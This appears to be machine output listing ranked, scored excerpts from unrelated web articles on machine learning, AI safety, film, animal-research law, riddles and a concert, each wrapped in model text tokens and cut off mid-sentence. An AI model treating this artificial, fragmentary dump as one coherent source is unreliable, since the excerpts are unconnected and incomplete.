for 15 years. + +-Fixed a +================================================================================ +Rank = 47; Score = 729088.0 +<|begin_of_text|>It’s been a while we haven’t covered any machine learning algorithm. Last time we discussed the Markov Decision Process (or MDP). + +Today we’re going to build our knowledge on top of the MDP and see how we can generalise our MDP to solve more complex problems. + +Reinforcement learning really hit the news back in 2013 when a computer learned how to play a bunch of old Atari games (like Breakout) just by observing the pixels on the screen. Let’s find out how this is possible! + +In Breakout the goal is to destroy all the bricks at the top of the screen by bouncing a ball over a paddle that you can move horizontally at the bottom of the screen. Every time the ball hits a brick your score increases. + +The idea + +If we want to teach a computer how to play that game, one solution might be to use a classifier such as a neural network where the input would be the screen images and the output the action to perform. It makes sense as for each screen we want to know if the paddle should move left or right (or stay still). The problem is that we need lots of training examples. But this is not how we learn! We don’t want someone to tell us a million time what we should do! + +Instead we learn by observing the reward we get as a consequence of our actions. This is the essence of reinforcement learning. An agent (the player) performs some actions which change the state of the environment (the pixels on the screen) and gets a reward for his actions (increase of score). + +Reinforcement learning lies somewhere between supervised and unsupervised learning. In supervised learning we have a label for every training example and in unsupervised learning there is no label at all. In reinforcement learning we have rewards which are sparse and time-delayed labels. Using only on those rewards the agent has to learn to behave in the environment. + +It may seem simple but there are some challenges along the way. When the ball hits a brick it has nothing to do with the action you just take. In fact it was the action performed when the ball bounced on the paddle that sent the ball against the brick. The problem of identifying which action is at the origin of the reward is known as the credit assignment problem. + +Markov Decision Process + +Doesn’t it sound familiar? Indeed, it looks quite similar to our tiny robot example we use to illustrate the MDP. + +The robot (the agent) moves (take actions) and gets a reward as it moves closer to +================================================================================ +Rank = 48; Score = 729088.0 +<|begin_of_text|>Photo + +Google and a corporation associated with NASA are forming a laboratory to study artificial intelligence by means of computers that use the unusual properties of quantum physics. Their quantum computer, which performs complex calculations thousands of times faster than existing supercomputers, is expected to be in active use in the third quarter of this year. + +The Quantum Artificial Intelligence Lab, as the entity is called, will focus on machine learning, which is the way computers take note of patterns of information to improve their outputs. Personalized Internet search and predictions of traffic congestion based on GPS data are examples of machine learning. The field is particularly important for things like facial or voice recognition, biological behavior, or the management of very large and complex systems. + +“If we want to create effective environmental policies, we need better models of what’s happening to our climate,” Google said in a blog post announcing the partnership. “Classical computers aren’t well suited to these types of creative problems.” + +Google said it had already devised machine-learning algorithms that work inside the quantum computer, which is made by D-Wave Systems of Burnaby, British Columbia. One could quickly recognize information, saving power on mobile devices, while another was successful at sorting out bad or mislabeled data. The most effective methods for using quantum computation, Google said, involved combining the advanced machines with its clouds of traditional computers. + +Google bought the machine in cooperation with the Universities Space Research Association, a nonprofit research corporation that works with NASA and others to advance space science and technology. Outside researchers will be invited to the lab as well. + +This year D-Wave sold its first commercial quantum computer to Lockheed Martin. Lockheed officials said the computer would be used for the test and measurement of things like jet aircraft designs, or the reliability of satellite systems. + +The D-Wave computer works by framing complex problems in terms of optimal outcomes. The classic example of this type of problem is figuring out the most efficient way a traveling salesman can visit 10 customers, but real-world problems now include hundreds of such variables and contingencies. D-Wave’s machine frames the problem in terms of energy states, and uses quantum physics to rapidly determine an outcome that satisfies the variables with the least use of energy. + +In tests last September, an independent researcher found that for some types of problems the quantum computer was 3,600 times faster than traditional supercomputers. According to a D-Wave official, the machine performed even better in Google’s tests, which involved 500 variables with different constraints. + +“The tougher, more complex ones had better performance,” said Colin Williams +================================================================================ +Rank = 49; Score = 724992.0 +<|begin_of_text|>Two recent events have inspired a slew of bad reporting in the UK about animal research. The first was a vote in Parliament rejecting a call to describe animals as sentient into British law. The second was the publication of the Northern Irish statistics. + +On 15th November, Parliament voted down an amendment to the European Union (Withdrawal) Bill that stated “Obligations and rights contained within the EU Protocol on animal sentience set out in Article 13 of Title II of the Lisbon Treaty shall be recognised and available in domestic law on and after exit day, and shall be enforced and followed accordingly.” While there is no clear scientific definition of sentience, it has, in crude terms, been taken to mean the capacity to feel pain and/or emotion. The relevant part of the Lisbon Treaty (which Britain will withdraw from upon Brexit) reads: + +In formulating and implementing the Union’s agriculture, fisheries, transport, internal market, research and technological development and space policies, the Union and the Member States shall, since animals are sentient beings, pay full regard to the welfare requirements of animals, while respecting the legislative or administrative provisions and customs of the Member States relating in particular to religious rites, cultural traditions and regional heritage. + +The amendment was rejected 313 votes to 295 (roughly down party lines). A few days later a number of articles began reflecting on this. A well-shared article in The Independent by Yas Necati claimed that the Government had voted “that all animals (apart from humans, of course) have no emotions or feelings, including the ability to feel pain.” + +What seems to have been ignored is that the protection of sentient animals is already embodied in British law. Most animal use is governed by the Animal Welfare Act, 2006, which protects any animals where an: “appropriate national authority is satisfied, on the basis of scientific evidence, that animals of the kind concerned are capable of experiencing pain or suffering”. The act also includes provisions to be extended to invertebrates if they seem to be able to suffer or feel pain. Essentially the Animal Welfare Act is an entire piece of UK domestic law dedicated to protecting sentient animals. + +For animals in laboratories, the relevant legislation is not the Animal Welfare Act, but the Animals (Scientific Procedures) Act, 1986 (better known as ASPA). This act protects all vertebrate species, and invertebrates considered potentially able to suffer or feel pain (currently only cephalapods). The act covers all “regulated procedures” defined as those “which may have the effect of +================================================================================ +Rank = 50; Score = 720896.0 +<|begin_of_text|>Tom Taylor is a candidate for Utah’s 4th Congressional District. To show your support, consider a donation at www.tomforutah.com, like him on Facebook (TomForUtah), or follow him on Twitter @TomForUtah. + +As I went through the Ph.D program in robotics at the University of Utah, I spent a lot of time thinking about automation, artificial intelligence, and the roles these technologies would play in the future. We are on the precipice of seeing radical change to our economy. Unfortunately, when most people think about automation, the first visual most people think of is a robot with personality like Wall-E or C-3PO. The truth is automation can come in a lot of different forms like self-driving vehicles, or software that quietly does the work for us that millions used to do a decade before. Self-driving vehicles alone have the potential to wipe out over 4 million jobs. Advanced software practices like machine learning are arguably more potentially disruptive being able to replace radiology jobs like analyzing CT scans and X-Rays. Legal work, music composition, and even software developers could also be on the chopping block. + +History has shown us that automation creates new jobs where previous ones were lost. Is there any reason to believe that “this time is different?” Yes, in fact, there is. There are two main factors that make the upcoming automation disruption concerning. First, the speed with which automation is likely to displace jobs is unprecedented. Second, we are seeing a trend in our economy where new technologies aren’t bringing enough gains in productivity to offset the gains that are going purely to capital — in other words, right now jobs are simply being replaced with machines instead of creating new and better career paths. These economic indicators predict that if we don’t do something about this, we could find ourselves in a world of mass unemployment, where the middle class has disappeared, and all of the money is concentrated in the hands of very few. + +Despite these concerns, it is the wrong idea to fight automation. Instead, we should embrace automation and change the structure of our economy so that we can all reap the benefits. Automation has the potential to lead to an increase of freedom in our lives where our lives aren’t dominated by banal tasks and we can choose the projects we work on. Imagine a world where the core necessities of life were completely taken care of by machines. Our food production could be completely automated where robots cultivate our farms, load the harvest on a self-driving truck which then delivers the food to a sorting facility +================================================================================ +Rank = 51; Score = 712704.0 +<|begin_of_text|>Academics from the Future of Humanity Institute (FHI), part of the Oxford Martin School, are teaming up with Google DeepMind to make artificial intelligence safer. + +Stuart Armstrong, Alexander Tamas Fellow in Artificial Intelligence and Machine Learning at FHI, and Laurent Orseau of Google DeepMind, will present their research on reinforcement learning agent interruptibility at the UAI 2016 conference in New York City later this month. + +Armstrong and Orseau’s research explores a method to ensure that reinforcement learning agents can be safely interrupted repeatedly by human or automatic overseers. This ensures that the agents do not “learn” about the interruptions, and do not take steps to avoid or manipulate the interruptions. + +Interruptibility has several advantages as an approach over previous methods of control. As Dr Armstrong explains, “Interruptibility has applications for many current agents, especially when we need the agent not to learn from specific experiences during training. Many of the naïve ideas for accomplishing this - such as deleting certain histories from the training set - change the behaviour of the agent in unfortunate ways.” + +In the paper, the researchers provide a formal definition of safe interruptibility, show that some types of agents already have this property, and show that others can be easily modified to gain it. They also demonstrate that even an ideal agent that tends to the optimal behaviour in any computable environment can be made safely interruptible. + +Dr Armstrong continued: “Machine learning is one of the most powerful tools for building AI that has ever existed. But applying it to questions of AI motivation is problematic: just as we humans would not willingly change to an alien system of values, any agent has a natural tendency to avoid changing its current values, even if we want to change or tune them. + +"Interruptibility, and the related general idea of corrigibility, allow such changes to happen without the agent trying to resist them or force them. The newness of the field of AI safety means that there is relatively little awareness of these problems in the wider machine learning community. As with other areas of AI research, DeepMind remains at the cutting edge of this important subfield.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 52; Score = 712704.0 +<|begin_of_text|>The first General Assembly On Immaterial Digital Labor and Universal Basic Income will meet on Friday, April 3rd, 2015 o Grand Street in New York. According to the organizers, the General Assembly will be the inaugural meeting of people interesting in exploring action-based responses to the global “time-famine” created by the digital economy, the collapse of work and play in social media and “hope labor” economies, the rise of unpaid internships, and the burgeoning freelance market. The inaugural meeting will begin to define responses to these issues and the goals of this assembly. + +The Assembly springs from the conversations in the Facebook Group, Immaterial Digital Labor, which includes some 970 members. The group has presented the topics of digital labor, automation, machine learning, and emergent definitions of labor and is moving forth towards more material action-based organizing. The organizers propose this as a gathering of people committed to making decisions based upon a collective agreement or consensus model. Anyone is free to propose an idea or express an opinion as part of the General Assembly. The Assembly will be led by facilitators only just as much as needed, no more. + +The Universal Basic Income will be proposed as one of many possible platforms of solidarity. An exercise defining the terms: immaterial labor, digital labor, knowledge-economy, and a short presentation will open the Assembly, followed by an open discussion moved by the proposed and collective interest of attendees. + +Friday, April 3rd, 2015 7:00-10:00 PM + +PARMER at Abrons Art Center + +Experimental Theater, 466 Grand St, New York, NY 10002 + +Statement: http://www.parmer.info/_events/2015-04-03-IDL-UBI-statement.html + +Event website: https://www.facebook.com/events/1067136066635771/ + +Facebook group: https://www.facebook.com/groups/immaterial.labor/?ref=br_tf + +Site: http://www.immaterialdigitallabor.net/ + +Email: with questions, comments, proposals, press inquiries.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 53; Score = 704512.0 +<|begin_of_text|>No film in recent years has had quite as much input from the field of psychology as Disney and Pixar’s latest offering, Inside Out. Charming though the film is, its portrayal of emotional life tells us a lot about how current psychological theories treat the study of emotions. This gives us an excuse to contrast these ideas with the somewhat more intricate and careful theories Freud and Lacan developed on the subject. + +Inside Out centres on Riley, an 11 year old girl who moves with her parents from Minnesota to San Francisco, an event which precipitates the emotional convulsions the film chronicles. The central premise is that Riley’s feelings can themselves feel. Every time an emotional experience is registered, a memory orb drops into the internal world, called Headquarters. Memory orbs affect the personified emotions – Joy, Anger, Disgust, Fear, and Sadness – characters which march on and compete with each other to take charge of the control panel in Headquarters which determines how Riley reacts. + +What is an emotion? Psychologists involved in the making of Inside Out speak with great confidence about the nature of emotions. Their commentaries explaining the psychology supporting the film are peppered with phrases such as “We know…”, “Scientific studies find…”, and “The truth is…”. These are followed by quite bold claims which should demand some caution unless we are sure we know what we mean when we refer to emotional experience. + +Here is one such claim, from two psychologists involved as consultants on the film: + +“Riley’s personality is principally defined by Joy, and this is fitting with what we know scientifically. Studies find that our identities are defined by specific emotions, which shape how we perceive the world, how we express ourselves and the responses we evoke in others.” (source) + +So, our emotions are the basis for our identity and our experiences will be determined by them, or at least by those that “principally define” us. This model puts a lot of explanatory weight on emotions so it is worthwhile to start by questioning what an emotion actually is. Most fundamentally, is it so easy to identify an emotion like joy, sadness, or anger as a distinct, separate thing? + +Freud and Lacan’s ideas about emotions are rich and complex. For Freud, emotions are compounds: they can be transformed, combined, or displaced. What we feel is very often the result of this process of distortion which produces a disconnect between the emotion we feel and the idea we associate with it. For instance, we may be angry at person A and produce a +================================================================================ +Rank = 54; Score = 704512.0 +<|begin_of_text|>Comment In the Blade Runner universe the Nexus 6 replicant calling itself Roy Batty rolled off the production lines of the Tyrell Corporation today. Sadly, or some might say luckily, the tech industry hasn't yet caught up with Hollywood. + +I do have a Nexus 6 on my desk right now, but it's a sizable phablet of a phone, rather than a humanoid killing machine. Technology still has a long way to come. + +Batty, masterfully played by Dutch actor Rutger Hauer, was what screenwriters thought would be coming down the line a generation later than filming. Like most science fiction creations, Batty's timeline was horribly wrong, but why don't we have humanoid robots walking among us these days? + +Firstly, programming a robot to mimic human beings is incredibly hard. The bipedal locomotion we're familiar with is something humans have evolved over a few hundred thousand years and it turns out it's surprisingly tricky to replicate. + +Balancing a high torso on mechanical hips and making a robot walk isn't something that's easy without a lot of computing power to stay stable. Anyone who has got wankered on a Friday night will appreciate the problem – balance is one of the first things to go when the brain gets sloppy. + +DARPA is currently trying to find a humanoid robot that can handle even simple tasks like opening a door or driving a car. So far the results haven't been good, to say the least. Building the hardware is easy – getting the motor skills to move it is something else entirely. + +At the time Blade Runner was made, mainstream computing was in its infancy. IBM had just brought out its first PC, chip manufacturers weren't even close to gigahertz speeds, and the rest of computer hardware like memory and hard drives were (comparatively) huge, slow, and very expensive. + +Batty was listed as a high-performance combat drone, with excellent intellectual abilities that would have put it in genius mode. Leaving aside the physical aspects of robotics (and clothing them in human skin – – which could well take another hundred years to manage) there's still a considerable brain gap to fill. + +After decades of trying, we're still nowhere close to artificial intelligence or even a computer that could pass the Turing test or convince JF Sebastian to trust it with his life. Even the most advanced machine-learning systems can be beaten by a five-year-old incentivized by a chocolate bar. + +Getting silicon smarter takes huge amounts of computing power – server racks full of hardware and carefully designed software subr +================================================================================ +Rank = 55; Score = 700416.0 +<|begin_of_text|>Warning: This piece contains major Blade Runner 2049 spoilers. + +“…you can’t disprove the existence of conscious experiences by proving that they are only an appearance disguising the underlying reality, because where consciousness is concerned, the existence of the appearance is the reality.” - John Searle, The Construction of Social Reality + +“But in the case / Of my white fountain what it did replace / Perceptually was something that, I felt, / Could be grasped only by whoever dwelt / In the strange world where I was a mere stray.” - Vladimir Nabokov, Pale Fire + +“…blood-black nothingness began to spin / A system of cells interlinked within / Cells interlinked within cells interlinked / Within one stem. And dreadfully distinct / Against the dark, a tall white fountain played.” These lines from Blade Runner 2049’s post-traumatic baseline test come from Vladimir Nabokov’s novel Pale Fire. In Pale Fire, the fictional poet John Shade sees a tall white fountain during a near-death experience - the image’s “presence always would / Console [him] wonderfully.” Later Shade reads about a woman in a magazine who came close to death, who visited “the Land Beyond the Veil” and also glimpsed a “tall white fountain” there. Shade finds the woman to share this with her, only to discover it was a misprint - it was not a “fountain” but a “mountain” that she saw. But the error changes nothing: the image of the tall white fountain had meaning not because it had some objective significance, not because it was empirical proof of an afterlife, but because Shade ascribed meaning to it. The fictional scholar annotating John Shade’s poem, Dr. Charles Kinbote, writes: “We all are, in a sense, poets.” + +And Denis Villeneuve’s Blade Runner 2049 is a poem. It’s a neo-noir about the mystery of the self, empathy, connection, how we define what’s real, whether it matters at all. And it’s a love story about a replicant and a digital woman. Screenwriter Hampton Fancher explained that, “[K] is a handbook. He follows the rules. He’s a machine in a way. But the image was this: A handbook turns into a poem through his experiences and his ordeal and love. And the same thing with the digital woman.” While retiring an old-model replicant, Ryan Gosling’s blade runner K discovers the skeleton of a +================================================================================ +Rank = 56; Score = 696320.0 +<|begin_of_text|>Maren Waldman is a dancer, choreographer, educator, and body-worker who is passionate about researching the ways that dance and movement build connection. Her work draws on permaculture principles, body awareness healing practices, and dance technique to specifically investigate the relationship between the body and the planet. Her art-activism takes a heart-centered approach to addressing urgent environmental concerns. + +Maren earned a Permaculture Design Certificate from the Finger Lakes Permaculture Institute in 2012 and an MFA in Dance Performance and Choreography with a focus on Somatics from the University of Colorado, Boulder in 2014. A former Ithaca resident, she is excited to return to her beloved homeland in June and share her work. + +Ms. Waldman’s current project, Postcards to the Earth, engages people in expressing their personal, emotional relationship to the Earth. The project exists in many forms including a live dance performance, a dance film, and a growing postcard collection. Maren will be sharing her postcard project at Radical Reconnecting through Permaculture, Ceremony, and Movement on the summer solstice, June 21, 2014. + +In an interview with this author, She describes her current work: + +A postcard is a simple act of communication typically sent from one to another across a distance. In western industrial society, we have chosen lifestyles that separate us from the Earth. We have forgotten our integral role as members of our planet’s ecosystem. Writing a postcard to a favorite place in nature invites us to pause in our busy lives, remember our connection to the earth, and take action through expression. My hope is that this postcard collection grows as people worldwide contribute their voices. The growing collection makes our collective voices visible and material, elucidating the reality of our human-earth relationship.” + +Maren tells FLPCI that the most valuable teachings from her permaculture education has been learning how much more possible it is to live in tune with nature. She says, + +Nature reveals patterns and systems that we can apply to use less energy in our approach to agriculture while providing more surplus. I also felt an emotional shift during the course as I slowed down my lifestyle to notice and feel just how wise, intelligent, and expressive nature is. I swelled with appreciation for the tiniest spider and the most magnificent, 200-year-old white pine tree. While I had never before studied agriculture or ecology, my FLPCI permaculture education has launched me into a world of curiosity about how I can more efficiently use resources in +================================================================================ +Rank = 57; Score = 696320.0 +<|begin_of_text|>When I started working on the play that became Marjorie Prime, I wanted it to be a collaboration with an artificial intelligence program. The idea was that I would have an extended conversation with a computer — a chatbot — and our exchange would become the dialogue of the play. It would then be performed by two human actors, and the audience would have to guess who was the computer and who was the human. I had recently read Brian Christian’s excellent book, The Most Human Human, about the Turing Test, originally devised by the British mathematician Alan Turing. It’s simple: you put a computer and a human being in another room, and you have to determine, from the way they answer your questions, which one is the human. + +My first day of writing, I quickly learned that A.I. software (at least the sort that a civilian can get ahold of) was not quite ready to hold up its end of the conversation. (Turing himself predicted that, by the year 2000, computers would be able to fool us 70% of the time, but this hasn’t quite come to pass.) Good news for mankind and bad news for the play. I ended up writing Marjorie Prime without computer assistance — though I remained inspired by the frequent misunderstandings and generic go-tos of my A.I. collaborator. + +Now, three years after finishing the first draft of the play, I thought I would give it one more go, and see if I could find a more worthy conversant this time around. One of the more promising chat apps on iTunes was called “Pocket Psychiatrist.” It intrigued me partly because some of the earliest A.I. programs were conceived as substitutes for human psychologists. (One program from the 1960s, called “Eliza,” famously used the phrase, “Tell me more about your mother.”) Here is the complete, unabridged conversation I had with Pocket Psychiatrist while, appropriately enough, reclining on a couch… + +Why don’t you start by telling me something that’s bothering you? + +Pocket Psychiatrist: Welcome. Why don’t you start by telling me something that’s bothering you? + +Jordan Harrison: I need to write an essay about my play for the Playwrights Horizons bulletin, and the deadline was yesterday. + +PP: Need is a very strong word. + +JH: Well, they asked me and I told them I would. + +PP: Don’t feel like you need to hold back. I’m here to listen. + +JH: Okay. Do you +================================================================================ +Rank = 58; Score = 692224.0 +<|begin_of_text|>I know this is not everyone’s dish of tea William Weld, former Massachusetts governor, uttered this one on MSNBC’s Morning Joe, when he introduced the topic of climate change. This is a mashup of “not one’s cup of tea” (not one’s preference) and maybe “dish it out” (to dispense something, often verbally)? Or was the speaker just thinking of “cup and saucer” and got the two confused? No one knows except Mr. Weld, and perhaps he doesn’t either. On that note, I think I’ll have a “disha”. A big thanks to two people who heard this one and sent it in almost simultaneously: David Stephens and Donna Calvert. Thanks David and Donna! Advertisements + +They would jump on a bullet for him This was uttered when discussing the blind loyalty of Trump supporters. It is a congruent conflation of “take a bullet for (someone)” and “falling (or jumping) on a grenade for (someone)”, both meaning to accept a personally harmful or sacrificial task to protect someone else. Jumping on a bullet doesn’t seem like a great sacrifice to me, so perhaps this speaker was not such a loyal follower. A big thanks to John Kooser for hearing this one. + +The Manafort situation throws the whole incentive system on its head Columbia Law School professor Berit Berger uttered this one on the MSNBC show “The 11th Hour with Brian Williams”. She was discussing the pardon system and the Manafort case. This is a mashup of “turn (something) on its head” (to alter something in an unexpected way) and “throw it out the window” (forgotten, disregarded). “Turning” and “throwing” seems to have caused the mixup here. A big thanks to Frank King for hearing this one. + +Is it “Defend On Your Own” night? The contributor says her husband says this when she doesn’t feel like cooking for dinner. The malaphor prompts a visual of the family opening the refrigerator and fighting for the best leftovers. This is a mashup of “stand on one’s (own) two feet” (act independently) and “fend for (oneself)” (take care of oneself without the assistance of others). I suppose the speaker was thinking of the word “fend” but uttered “defend” instead. A tip of the hat to Lori Snider for sending this one in! + +My hackles were ruffled This was overheard at a nearby table at +================================================================================ +Rank = 59; Score = 688128.0 +<|begin_of_text|>The joke that was old when Moses was around: Tablet full of crude gags and riddles about beer is found - dating back to Exodus + +Crude jokes, beer and a hearty disregard for politicians were part of life in ancient Mesopotamia - 3,500 years ago. + +A newly translated tablet from the area of present-day Iraq runs through a series of riddles which show that even in 1,500BC, people liked a puzzle. + +Modern audiences, though, should not expect to have their sides split - or indeed to solve any of the riddles, which are rather tricky (the riddles and their solutions are below). + +Cuneiform script as seen in a clay tablet, found at Tell-El-Amarna, Egypt: The location of the tablet of riddles is not known, and the study authors worked from a transcription from 1976. The museum it was in was looted during the 2003 Iraq war + +CAN YOU THINK LIKE A MESOPOTAMIAN? THE RIDDLES - AND THE ANSWERS + +'In your mouth and your teeth (or urine). Constantly stared at you. The measuring vessel of your lord. What is it?' Answer: Beer. 'The tower is high, but it has no shade.' + +Answer: Light. The riddle refers to a shaft of light hitting the ground. + +He gouged out the eye. It is not the fate of a dead man. He cut the throat: A dead man - who is it?' + +Answer: A governor - the joke here could be that a governor is portrayed as executioner. The two rudest riddles have missing answers - or ones that don't make sense. 'The deflowered girl did not become pregnant. The undeflowered girl became pregnant. What is it?' + +Answer: Auxiliary forces. The term for a group of soldiers is puzzling here, says Wasserman. + +'... of your mother, is by the one who has intercourse with her. Who is it?' + +Answer: Perhaps thankfully, this answer has been lost. + +Few riddles in the Akkadian language survive. + +It was commonly used by the ancient Babylonians and other civilisations around the area of present-day Iraq. + +The tablet dates to the time of the Biblical Exodus, and is thought to have been written near the Persian Gulf. + +It was written in cuneiform script. + +The text has large parts missing, and also appears to have been carved by an inexperienced scribe. + +The text was translated by Michael Streck of the University +================================================================================ +Rank = 60; Score = 679936.0 +<|begin_of_text|>Healthwise + +Columnist Larry R. Miller (Photo: Courtesy Photo) + +When the neural pathways in the brain became stronger, deeper ruts, we began to think, feel, act, and believe in automatic ways. When that's the case we begin to operate more and more within the boundaries of those ruts in your brain. Then we begin to feel, think, behave, respond and believe that we can’t change or that changing would be very difficult. You know those thoughts that course through your mind “Well, that’s the way I am. That’s who I am.” Once we believe that, we begin to look for more ways to solidify our convictions that we’re right about whatever we believe is true and that change isn’t possible. + +Anything you repeat over and over whether it's mind talk, something you practice or are repeatedly exposed to, the effects are the same, it causes a change in your brain. More neural pathways are made available for doing, thinking, believing, feeling or being “it”. The result is a new neural pathway is created for it. + +In the early days of brain plasticity research, monkeys were trained to push a lever over and over for many days. When the brains of the monkeys were looked at, researchers found that lots of neurons had been dedicated to lever-pushing. + +Most of our lives are spent in the beta brain wave state. The beta wave represents excitement of the cortex to a higher state of alertness and tension. This is a good place to be some of the time but not all the time. The alpha, theta, delta, and gamma brain waves are more resourceful brain wave patterns and meditation can help you become better at creating them. + +These brain wave states are involved in the most fundamental human ability-awareness. When you're in those states, you’re not just creating new neural pathways, new ruts, you’re creating super-awareness. Awareness, super awareness in particular, creates choice and when you're able to create choices, you can choose what you want to experience in life. + +Repeated meditation or other ways to enter these brain wave states allows for a is a huge increase in awareness, which allows you to see that you have choices about, and the ability to change, your automatic responses. And, as a result, you can choose to step out of the ruts that no longer are beneficial. Once these new patterns become the established norm, you’ll naturally choose to do, feel, think and be what's best for you to reach the goals you have set +================================================================================ +Rank = 61; Score = 675840.0 +<|begin_of_text|>It’s no secret. I love Paul McCartney. I’ve been a diehard Beatles fan since before my teens and my love and admiration for the four men who made up that legendary band have never waned. + +And I’m not alone. California 9-year old Sara Scally, whose family vacation to Florida was scheduled around Paul’s Tampa show at Amalie Arena, loves him too. I asked the youngster, who has been enamored of the former Beatle since her toddler years (this was her third McCartney show) why she loves him. + +“He’s a good singer!” she replied matter-of-factly. + +It’s that simple. + +And she and I were certainly not alone at the Amalie. More than 17,000 folks of all ages crammed into every available seat in the downtown Tampa arena on Monday night to sing along and be taken down that magical mystery tour of McCartney’s life in music. And when Paul sings, people listen. And they remember. And they feel. And they react. + +Playlist: Listen to every song Paul McCartney played at Tampa’s Amalie Arena on July 10 + +And boy did they have plenty to react to. A three-hour journey that touched on the earliest days of his long career right up through his latest work might not have been what many in attendance were expecting out of the 75-year old performer, but Macca smashed those expectations and steamrolled on with the finesse and the drive of a seasoned pro, which is exactly what he is. + +Without the aid of an opening act, Sir Paul and his four-piece band walked onto the massive, darkened stage to thunderous applause and wasted no time jumping into the night’s barrage of hits. Spry, slender and fit, Paul donned a dark blue blazer, white shirt and jeans and looked comfortable and ready for the long night ahead. The familiar opening chord of the Beatles classic “A Hard Day’s Night” struck and, again, the rafters shook as every single person in the place stood and cheered loudly. + +Two giant screens on either side of the stage projected larger-than-life images of McCartney while colorful, geometric shapes danced on the screens at the rear of the stage. If ever there were a moment that perfectly conjured a celebratory mood, it was this opening number. + +Hell, even other famous musicians lose their inhibitions and can’t help themselves when Paul McCartney takes the stage. Seated nearby was ex-Hootie and the Blowfish lead singer Darius Rucker and his family, all feverishly snapping photos of +================================================================================ +Rank = 62; Score = 671744.0 +<|begin_of_text|>Humans: New Sci-fi drama unsettles, grips and tackles robot relations head on + +There are two very good reasons to watch Humans, the new robot-themed drama series that premiered in the UK on Sunday. Firstly, it’s a well-made high-energy thriller with a pacy storyline, focusing on a domestic future not unlike the present – only with robots. Secondly, it tackles the questions we should be asking about that future. + +“Should we get one?” That’s the initial poser for the Hawkins family, who are living in a parallel present where the latest labour-saving gadget is a life-like humanoid. And, when they do, much to working Mum Laura’s (the IT Crowd’s Katherine Parkinson) dismay, things go predictably awry. Because the synth, as its called, turns out to have emotions. + +And that’s not the only issue. Anita, the Hawkins’ synth (played artfully by Gemma Chan) is rather gorgeous, as stay-at-home dad Joe Hawkins (Tom Goodman-Hill) can’t help noticing. She has an altogether different effect on teenage daughter Mattie (Lucy Carless), who believes her generation are being supplanted by robots. It’s a theme that will be interesting to see unfold as the series progresses. + +Humans, adapted by a team of Spooks writers from a Swedish TV drama, also has a number of other strands. Merlin star Colin Morgan is the leader of a band of renegade “emotional” synths and an aged George Millican (William Hurt) forms an attachment to his dysfunctional unit, Max (beautifully played by Ivanno Jeremiah). + +It’s not difficult to see why Millican feels this way: the ailing Max is not only attuned to his owners comforts and preferences, but is also a receptacle for his memories, recalling the past even better than Millican is able to himself. + +Conundrums of this nature are scattered throughout the drama, where robots are seen to perform all manner of jobs, from street cleaning to sex work, their status akin to immigrants or even slaves. It’s remarkably easy to feel sorry for their lot. + +Humans has had an excellent reception, “electrifying” four million viewers and setting a new record for Channel 4 drama. + +But UK broadsheet the Telegraph was less than impressed and accused the series of conceptual overload, which is perhaps a little short sighted. + +Humans is not easy watching. It forces you to ask: what is emotion? Is it something we’re born with, or can it be +================================================================================ +Rank = 63; Score = 671744.0 +<|begin_of_text|>When looking for inspiration to set our entrepreneurial journeys on point, we look at different regions of success to guide our way forward. We get inspiration from Jeff Bezos, Mark Zuckerberg, Bill Gates and Warren Buffet, but we sometimes forget that some of the biggest companies run in the world are being managed by Indian-origin leaders. We have a huge network of hard-working change-leaders in the world and the message is clear – “India is changing the world today”. With these former employees-turned CEOs taking the reins at some of the biggest companies world-wide, here’s a bit more about their inspiring journeys. + +Image: Shutterstock + +Sundar Pichai + +We all know Sundar; he’s been at the helm of Google for many years now and taken over from Larry Page’s well executed ship and turned it into a scalable coherent and integrated offering in the ad-tech and innovation space in the world. He was born in Chennai in the 1972, where even at a young age he was fascinated by tech and hardware. His dad was his greatest inspiration behind his early curiosity, and he attributes that to his success in IIT-K and subsequently Stanford Engineering School. He started working on Google Chrome, and moved on to Google Toolbar and many other innovations that further enhanced the growth of the Chrome 